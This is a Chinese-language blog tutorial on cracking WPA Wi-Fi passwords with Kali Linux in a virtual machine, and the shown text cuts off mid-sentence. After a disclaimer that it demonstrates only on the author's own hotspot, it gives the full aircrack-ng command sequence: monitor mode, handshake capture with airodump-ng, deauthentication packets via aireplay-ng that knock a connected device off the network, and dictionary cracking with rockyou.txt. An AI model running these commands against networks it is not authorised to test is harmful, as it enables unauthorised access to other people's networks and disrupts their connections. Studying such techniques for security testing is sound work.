不怕没网上（破解wifi密码）

声明：破解他人Wi-Fi是违法行为，所以我用破解自己的Wi-Fi做演示。

首先，让我们简单介绍一下某钥匙破解Wi-Fi的工作原理。TM的简直就是流氓行为。为什么这么说呢？因为它的工作原理并不是真正破解密码，而是将其他人的密码分享给你。你也许会很高兴，竟然能够分享密码给你，但别忘了，它也能分享你家的Wi-Fi密码，只要你打开它。这个钥匙实际上是一个非常强大的数据库，收集了很多人的Wi-Fi密码（这难道不是流氓行为吗！）所以，在这里我要介绍一下真正的破解密码方法（一点都不流氓，只是有点粗鲁~）大家可以使用物理机来破解，但在这里我只介绍使用虚拟机来破解（更安全一些）。

破解工具Kali

Kali Linux是Linux系列中Debian系统的变体，专门用于渗透测试（黑客非常喜欢使用，作者是电脑白痴）。它可以做很多事情，包括破解Wi-Fi、查询漏洞、破解电脑密码（例如系统密码，如果不想让室友使用你的电脑，建议在BIOS中给电脑加密，这样只有你自己能打开你的电脑，办公室里的电脑感觉就像渣一样，毫无安全感可言）。废话少说，下面开始安装Kali。

选择稍后安装操作系统，然后进行以下参数设置。将虚拟机的内存改为1G，选择你下载的Kali系统镜像（.iso文件），设置好后点击确定。

安装Kali系统

前面我们只是装好了一个空壳，现在我们要往里面安装东西了。点击“开启此虚拟机”选项，选择视图安装，然后等待系统安装完成。

破解Wi-Fi密码（暴力破解，所以我说有点粗鲁）

1. 打开Kali，打开终端（相当于打开Windows下的命令提示符）。

2. 解压Kali自带的字典（用于破解密码）。在终端输入命令：gzip -d /usr/share/wordlists/rockyou.txt.gz。

3. 检查是否有支持监听模式的网卡。台式机一般没有（需要外接一个802.11的无线网卡），笔记本一般都支持。输入命令：airmon-ng。显示有一个网卡设备wlan0支持监听模式。

4. 开启监听模式。输入命令：airmon-ng start wlan0。wlan0变成了wlan0mon，表示开启成功。

5. 扫描周围的Wi-Fi信号。输入命令：airodump-ng wlan0mon。箭头所标示的就是我们要破解的Wi-Fi（我自己手机热点的名字）。扫描到目标Wi-Fi后按Ctrl+C停止。

6. 抓包。输入命令：airodump-ng -c 11 --bssid E4:46:DA:E9:2D -w ~/ wlan0mon。其中，-c表示通道（即目标Wi-Fi信号所在的位置），-bssid表示目标Wi-Fi的MAC地址，-w表示抓到的包存放位置。

7. 强制目标Wi-Fi停车（假装成警察）。在另一个终端中输入命令：aireplay-ng -0 2 -a E4:46:DA:E9:2D -c E4:F8:9C:7C:15:5F wlan0mon。其中，-a表示目标Wi-Fi的MAC地址，-c表示连接设备的MAC地址。

8. 使用Aircrack和Kali自带的字典破解密码。输入命令：aircrack-ng -a2 -b E4:46:DA:E9:2D -w /usr/share/wordlists/rockyou.txt ~/*.cap。

破解密码成功！

请注意，纯数字密码很容易破解（毫无难度可言），但如果使用字母加数字的组合密码，使用Kali自带的字典通常无法破解。必须使用更强大的字典。而且，